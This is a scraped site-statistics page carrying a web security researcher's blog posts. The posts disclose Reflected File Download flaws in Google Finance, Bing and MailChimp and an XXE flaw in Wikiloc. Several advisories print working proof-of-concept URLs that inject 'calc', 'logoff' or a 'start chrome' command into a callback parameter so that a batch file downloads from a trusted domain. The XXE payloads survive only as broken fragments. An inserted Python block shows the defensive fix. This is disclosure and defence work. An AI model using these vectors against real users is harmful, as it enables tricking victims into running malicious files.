davidsopas.com David Sopas - Web Security Researcher - Hire Web Security

Title: David Sopas - Web Security Researcher - Hire Web Security
Keywords: xss, sql injection, my site was hacked, site defaced, rfd, csrf, bounty, reward
Description: Just another WordPress site
davidsopas.com is ranked 2237552 in the world (amongst the 40 million domains). A low-numbered rank means that this website gets lots of visitors. This site is relatively popular among users in the United States: it gets 50% of its traffic from the United States. This site is estimated to be worth $6,002. It has a low PageRank (0/10) and 1 backlink. davidsopas.com has a 43% SEO score.

davidsopas.com Information

Website / Domain: davidsopas.com
Website IP Address:
Domain DNS Server: ns2.linxisp.net,ns4.linxisp.net,ns3.linxisp.net,ns1.linxisp.net

davidsopas.com Rank

Alexa Rank: 2237552
Google Page Rank: 0/10 (Google Pagerank Has Been Closed)

davidsopas.com Traffic & Earnings

Purchase/Sale Value: $6,002
Daily Revenue: $16
Monthly Revenue: $493
Yearly Revenue: $6,002
Daily Unique Visitors: 1,513
Monthly Unique Visitors: 45,390
Yearly Unique Visitors: 552,245

davidsopas.com Website HTTP Headers

StatusCode 200
Content-Type text/html; charset=UTF-8
Date Tue, 16 Aug 2016 07:35:19 GMT
Server Apache

davidsopas.com Keyword Counts

Keyword               Count   Percentage
xss                       7        0.11%
sql injection             0        0.00%
my site was hacked        0        0.00%
site defaced              0        0.00%
rfd                      17        0.27%
csrf                      1        0.02%
bounty                    7        0.22%
reward                    1        0.03%

davidsopas.com Html To Plain Text

David Sopas - Web Security Researcher - Hire Web Security

Featured advisories and posts: Edmodo XSS and HTML Injection; Events Made Easy WordPress plugin CSRF + Persistent XSS; Shopify open to a RFD attack; Swag T-shirt, deck of cards and stickers from Cobalt.io; Win $50 Amazon Gift card with a XSS challenge; ArubaNetworks Avatar Image XSPA; First to reach 1000 rep score on Cobalt.io; Desk.com Reflected Filename Download.

05/08/16 - Advisories, Bug Bounty, Interesting Readings
Latest work done

Just to give a small update on my work... I've been more active on my Twitter account, so follow me to get the latest updates on my security work. Also, here is some work I've done:

- (Cobalt.io) – The Top 10 Vulnerabilities used by David Sopas to reach #1 at Cobalt
- (Char49) – Flash XSS on typewrite_header.swf
- (Char49) – Char49 helps Microsoft fix a Reflected File Download
- (Checkmarx) – When Booking Your Flight Become Dangerous

Regarding conferences, I've been at Join 2016 @Braga presenting the talk "Hacking from Black to White".

24/03/16 - Advisories, Bug Bounty (tags: advisories, full disclosure, security researcher, uber, vendor)
Hey vendors, researchers are here to help

Yesterday I was exchanging some messages on Twitter – especially with Kymberlee Price (from BugCrowd) – about the relationship between vendors and security researchers when disclosing a security issue. In my experience I know the feeling of trying to help a vendor and being ignored or, in some extreme cases, even being "invited" to stop what you are doing on their website. Vendors need to understand that most security researchers are here to help – working on the same side against the bad guys. The problem in this connection is trust. Vendors don't trust researchers. Researchers are losing trust in vendors. We need to fix it.

I had a bad experience with lots of big IT companies, especially the ones whose products I usually use. I don't go around companies and test vulnerabilities like crazy. I just like to feel more secure when using some web application. In my opinion these are the main issues:

- Lack of information on where to report a security issue
- Security report gets lost in their support system
- The vendor doesn't reply back or just says it will be forwarded to the development team
- Vendor doesn't update the security status
- Researcher could even get threatened about the report

But not all vendors are like that. I already tried different approaches which seemed to work:

- Email the vendor giving them a small presentation telling who you are and ask for the right person to deal with a security threat
- After you get the email, try to schedule an online chat or even a Skype meeting to establish some kind of trust between both parties. Talk about what you found, the consequences and a possible solution.

If you manage to do all this I bet the treatment in the future will be better for you and for future researchers who try to contact them. You as a researcher have the responsibility to prepare the path and improve the communication with vendors. Don't give them hell! Give them trust!

Even on bug bounty programs you have issues. Vendors who reply to your report in 1 year without even worrying about giving the researcher feedback like: We're working on it. It will take some time, maybe weeks or months... Even yesterday – Sean Mealia wrote on his Twitter that Uber changed their in-scope program after he sent a couple of security issues. It also happened to me in a private program for a popular online newspaper. I reported a security issue where an attacker could steal users' information and they categorized it as "Informative" and fixed it in a couple of days. This type of situation is not good for the business. Vendors must respect the researchers and vice versa.

Well, these are my thoughts about this, feel free to share yours in the comments section. For those who are interested in this topic I recommend watching the video of Kymberlee Price at Kaspersky Security Analyst Summit 2016.

21/01/16 - Advisories (tags: google, google finance, rfd)
Google Finance Reflected File Download

Found this vulnerability when auditing another client. With this RFD you don't need to create a page to force the download. The request for this Google JSON file already does this for us. When I noticed this request:

http://www.google.com/finance/info?q=ELI:ALTR&callback=?

Which returned the following information:

// [ { "id": "703655" ,"t" : "ALTR" ,"e" : "ELI" ,"l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 15, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:35:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ]

I wondered if that callback parameter could be manipulated. So I injected "calc" on the request:

http://www.google.com/finance/info?q=ELI:ALTR&callback=calc

Which returned the following information:

// calc([ { "id": "703655" ,"t" : "ALTR" ,"e" : "ELI" ,"l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 15, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:35:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ] );

Done! Got my injected Windows command on this XHR request. Time to check if the URL is permissive:

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc

Guess what? I got a URL that automatically shows the download dialog from Google with a batch file. I tried successfully with the following browsers:

- Firefox latest version
- Opera latest version
- Internet Explorer 8 and 9

What are the limitations? I noticed in my testing that most of the chars are being sanitized, so it only allows you to use one command without spaces or arguments.

Proof-of-concept:

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc [when the batch is executed the Windows calculator opens]
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff [when the batch is executed the system logs off the authenticated user]

Possible attack scenario: Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim. Victim downloads the file and executes it. After execution of the batch file it will log off the victim from the operating system.

I made a small video that illustrates my proof-of-concept:

Google decided that this issue has very little or no security impact. Personally I don't agree, but that's my opinion. So this RFD is still unpatched. I hope they change their mind and fix this soon.

19/01/16 - Advisories (tags: acknowledgments, bing, microsoft, rfd)
Bing Reflected File Download

When using the Bing online translator I noticed an XHR request on my browser that caught my attention:

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499

Which reflected on the screen:

jQuery111207287312552798539_1444907172498();

As a security researcher I always try to find different ways to bypass security, especially related to Reflected File Download. So I tried to inject a RFD vector on the parameter "oncomplete":

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm

Which reflected on the screen:

start chrome davidsopas.com/poc/malware.htm();

Using the HTML5 download attribute I was able to send a security report to Microsoft, which they fixed within a month. With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the fourth time.

18/01/16 - Donations (tags: cats, dogs, food, health, shelter)
Give!

I've been blessed with the opportunity to help others in need, so yesterday I delivered more food to a local animal shelter. I was received with a big smile and a warm hug from the shelter owner. I also had the chance of checking on a 22 year old female dog called "Docas". Such a sweet thing. I also contributed to the yearly maintenance of the web hosting and domain of a public health institution. They care so much for their patients and give their best every day, so I decided they deserve a small help from my part. Helping others is something that we all should do. You don't need to donate money. Sometimes just listening is helping...

14/01/16 - Tips and Tricks (tags: .mario, event handlers, html5)
201 event handlers supported by modern browsers

An updated list of 201 event handlers supported by modern browsers https://t.co/KXTRx6PppO (and some old ones too) — .mario (@0x6D6172696F) December 26, 2015

11/01/16 - Advisories (tags: gps, gpx, wikiloc, xxe)
Wikiloc XXE vulnerability

For those who still don't know Wikiloc: "Wikiloc is a place to discover and share the best outdoor trails for hiking, cycling and many other activities. We are 1,725,606 members exploring and sharing 3,936,841 outdoor trails and 6,503,289 photos."

I was searching for a cool track to ride my bike [yes I love #cycling] and I created an account on Wikiloc. I already knew the site but had never registered. Such a cool site in my opinion. As a security researcher I always take a look at the web application's requests and transactions, and after uploading an XML I remembered to test Wikiloc for an XXE vulnerability. This is a very dangerous type of vulnerability and could be used by malicious users to compromise the server.

So let me explain what I did. First I downloaded a .gpx file from Wikiloc to see the structure of the XML. I injected the following line on top of the file:

]>;

And called the entity on the track name:

]> 2015-10-29T12:53:09Z &xxe; 178.000000 2009-01-10T14:18:10Z (...)

I uploaded the .gpx file and voilà! Got a request made by the Wikiloc server to my own:

GET /XXE/ 10/29/15 1:02 PM Java/1.7.0_51

To make sure that was their server I resolved the IP, which was master.wikiloc.com. I also know what version of Java they were using – 1.7.0_51. But to show how dangerous it can be I wanted to test for external DTD and request a file hosted on the Wikiloc server – /etc/issue [which will return the operating system used]. So I modified another .gpx file with the following code:

%dtd;]> 2015-10-29T12:53:09Z &send; (...)

xxe.dtd has the following XML code:

"> %all;

I uploaded the new .gpx file and got the following GET request on my server:

GET /XXE/?Debian 10/29/15 1:12 PM Java/1.7.0_51

With XXE you can do a variety of things. A malicious user could upload files, check source code, launch DDoS attacks, you name it. This issue is already fixed by Wikiloc. They were very fast and concerned about this. It shows that they care about security. Also they provided me with a token of appreciation (they know exactly how to please a cyclist) and also put my name on their contributors list. Keep up the good work Wikiloc!

07/01/16 - Swag (tags: adobe, google, help, infosec, microsoft, yahoo)
Companies that I've helped improve their security

Google, Yahoo!, eBay, Microsoft, Etsy, Nexmo, Weebly, Edmodo, HackerOne, Desk, Adobe, ArubaNetworks, Condé Nast, Linkedin, Acunetix, SendGrid, Rocky Bytes, DepositFiles, Workable, MailChimp, Prestashop, HP, Kaspersky, OLX, RunKeeper, Tumblr, ESET, Symantec, Dowjones, Issuu, Jobs.cz, Alexa/Amazon, McAfee, Booking, AVG, Panda Security, Hootsuite, Circle, DoSomething, Zendesk, Nokia, 123 Contact Form, FoxyCart, Orkut, Segment.io and SilentCircle. The other ones are private.

06/01/16 - Interesting Readings, Tips and Tricks (tags: bugbounty, patch, rfd, vendors)
Why do some vendors ignore RFD attacks?

Since I published my Reflected File Download Cheat Sheet I'm getting lots of private messages and emails from security researchers and bounty hunters telling me that most companies ignore RFD attacks. So I decided to clear things up and answer the three most popular questions.

First a little introduction. In my opinion there are three ways of implementing a successful RFD attack:

(1) URL address automatically prompts the download dialog in most popular browsers
(2) Attack is only available using an external page in modern browsers but works like (1) in Internet Explorer 8 and 9 browsers
(3) Attack is only available using an external page in modern browsers

"Reflected File Download is a social engineering attack."

On attack scenario (1) the victim is prompted with a download dialog just by visiting/clicking the URL – just like a reflected XSS, but here the victim downloads a file from a trusted source. In 90% of the cases the victim runs the file. Imagine having the following URL:

https://www.google.com/app/setup.bat?callback=calc [It's just an example, this will not work]

If the victim runs the URL it will prompt the download of setup.bat. On Chrome you don't need to see the source because you see the URL. On Firefox and IE you'll see the source on the download dialog.

Attack scenario (2) works like (1) in IE 8 and 9. Other browsers need an external page to work, using the HTML5 download attribute. The attackers in this last case need to launch a malicious campaign with that link. It's like phishing emails but here the URL is from a trusted source. Imagine this attack scenario:

- Attacker creates a page with a RFD link to a hosting company
- That page offers domain or hosting promo codes
- When the victim checks the link (mouse hover or view the source code) it will see that it's from a trusted source [the hosting company]
- Victim clicks the link and downloads the file (when they view the source of the download they will see the hosting company)
- Victim gets hijacked

On attack scenario (3) it's the same scenario as (2) but doesn't work, as told before, on IE 8 and 9.

Some may consider (2) and (3) a social engineering attack. The attacker needs to attract victims into his RFD page. For me it's a grey area. There are lots of ways to bring victims to a malicious page [blackhat SEO, forums, social networks] without too much trouble. The key point here is that the RFD URL is from a trusted source, which gives the victim a little confidence that they will download something that is what they are looking for. Companies that ignore this will have their reputation affected because they didn't do anything to prevent this attack on their clients.

"We can't do anything about it. It's an external page that we can't control."

Wrong! On (1) you don't need an external page. On (2) and (3) the affected companies can protect and prevent RFD attacks by forcing the filename:

content-disposition:attachment; filename="f.txt"

Even if the attacker's external page is using:

Click here

It will try to download f.txt. Workable fixed this by using the following:

"Google doesn't consider this to be an issue"

Google has a specific page that tells security researchers that Reflected File Download security reports aren't reliable for a reward. But at the end of the text you can read the following: "Before sending a report please remember to include a realistic attack scenario, preferably, one that doesn't require social engineering." I already sent two scenario (1) issues to Google and they were both accepted. So always give a good attack scenario.

I already helped most popular companies to fix Reflected File Download issues – Yahoo!, eBay, Microsoft, Google, Linkedin and many more. Keep your security report clear and complete. Don't argue with the affected company about their opinion. It's their prerogative to deny your security report. In the end it's their decision. – Keep calm and carry on! Have a good and secure year of 2016.

23/12/15 - Advisories (tags: cobalt.io, list-manage.com, mailchimp, rfd)
MailChimp Reflected File Download

When auditing a MailChimp client for Cobalt.io I noticed that this company suffers from a Reflected File Download vulnerability that could be exploited only by using the HTML5 download attribute. Let's take a look into the original GET request:

http://[mailchimp_client].us5.list-manage.com/subscribe/post-json?u=41352a29fd45def27e8aea4cd&id=91d16923d8&c=?

This request is part of the subscription to an email campaign at MailChimp. Checking the URL you can see the "c" parameter is nothing more than the callback:

?({"result":"error","msg":"Blank email address"})

Putting my RFD vector on the callback:

http://[mailchimp_client].us5.list-manage.com/subscribe/post-json?u=41352a29fd45def27e8aea4cd&id=91d16923d8&c=start%20chrome%20davidsopas.com/poc/malware.htm||

I get the following reflected:

start chrome davidsopas.com/poc/malware.htm||({"result":"error","msg":"Blank email address"})

Because list-manage.com is not URL permissive I needed to use an external page to create my proof-of-concept:

Install MailChimp toolbar to improve your email send score! (Use "Save Link As" to download the file)

So a possible attack scenario would be:

- Victim visits a specially crafted page – like my PoC
- Victim downloads the file using Save Link As (which comes from a trusted domain – list-manage.com)
- Victim gets hijacked

Because the download comes from a trusted domain, victims are tricked into executing files that they are not supposed to. This works perfectly on the latest versions of Google Chrome and Opera.

MailChimp considered this issue to be a social engineering attack, so they'll not fix it. In my opinion this is something that this company could prevent from happening just by adding a header to their request. In the end it's a MailChimp decision, not mine. When I requested the disclosure of this report MailChimp replied: "We neither condone nor prohibit you from adding this to your security blog." Hope it helps other companies and security researchers to better understand RFD...
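The two server-side defences the RFD posts above point at, shown together as an added Python example (not code from David Sopas or from Google, Bing or MailChimp): a strict allowlist on the JSONP callback name, which rejects shell-style vectors like the one reflected by list-manage.com, and the fixed-filename Content-Disposition header the "Why do some vendors ignore RFD attacks?" post recommends, which matters because a bare "calc" still passes any identifier allowlist. The endpoint path, header values and sample payload are assumptions modelled on the Google Finance response quoted above.

```python
import json
import re
from typing import Dict, Tuple

# Allowlist for JSONP callback names: a plain JS identifier, optionally dotted
# (jQuery-style "jQuery1112..._1444..." names pass), capped in length. Anything
# with spaces, slashes or pipes, e.g. "start chrome davidsopas.com/poc/malware.htm||",
# is rejected and the endpoint answers with plain JSON instead.
_CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
_MAX_CALLBACK_LEN = 64

# Constructed sample payload, trimmed from the Google Finance response quoted above.
SAMPLE_PAYLOAD = [{"id": "703655", "t": "ALTR", "e": "ELI", "l": "4.71"}]


def is_safe_callback(callback: str) -> bool:
    """True only for a plain (optionally dotted) identifier of bounded length."""
    return 0 < len(callback) <= _MAX_CALLBACK_LEN and bool(_CALLBACK_RE.match(callback))


def path_is_exact(request_path: str, endpoint: str) -> bool:
    """A 'URL permissive' router accepts '/finance/info;setup.bat' for the
    '/finance/info' handler, letting the browser pick a .bat filename from the
    URL. Route only the exact path (assumed endpoint names)."""
    return request_path == endpoint


def vulnerable_jsonp(callback: str, payload) -> Tuple[str, Dict[str, str]]:
    """Weak behaviour: the callback is reflected verbatim and no Content-Disposition
    is sent, so a download dialog names the file after the URL (the RFD case)."""
    body = f"{callback}({json.dumps(payload)});"
    return body, {"Content-Type": "text/javascript"}


def hardened_jsonp(callback: str, payload) -> Tuple[str, Dict[str, str]]:
    """Hardened behaviour: validate the callback, fall back to plain JSON when it
    is unsafe, and pin the download filename with Content-Disposition so even a
    reflected 'calc' can never be saved as setup.bat from the trusted domain.
    Browsers ignore Content-Disposition for <script>/XHR consumers, so normal
    JSONP clients keep working."""
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="f.txt"',
    }
    if not is_safe_callback(callback):
        headers["Content-Type"] = "application/json; charset=utf-8"
        return json.dumps(payload), headers
    # Leading comment prefix, as in Google's "// " output, stops the response
    # from being interpreted as anything but a script.
    return f"/**/{callback}({json.dumps(payload)});", headers


if __name__ == "__main__":
    for cb in ("calc", "start chrome davidsopas.com/poc/malware.htm||"):
        print(cb, "->", hardened_jsonp(cb, SAMPLE_PAYLOAD))
```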
Copyright © 2015 DavidSopas.com - Follow this blog's updates by RSS.

davidsopas.com Whois

Registrar URL: http://www.godaddy.com
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Name Server: NS1.LINXISP.NET
Name Server: NS2.LINXISP.NET
DNSSEC: unsigned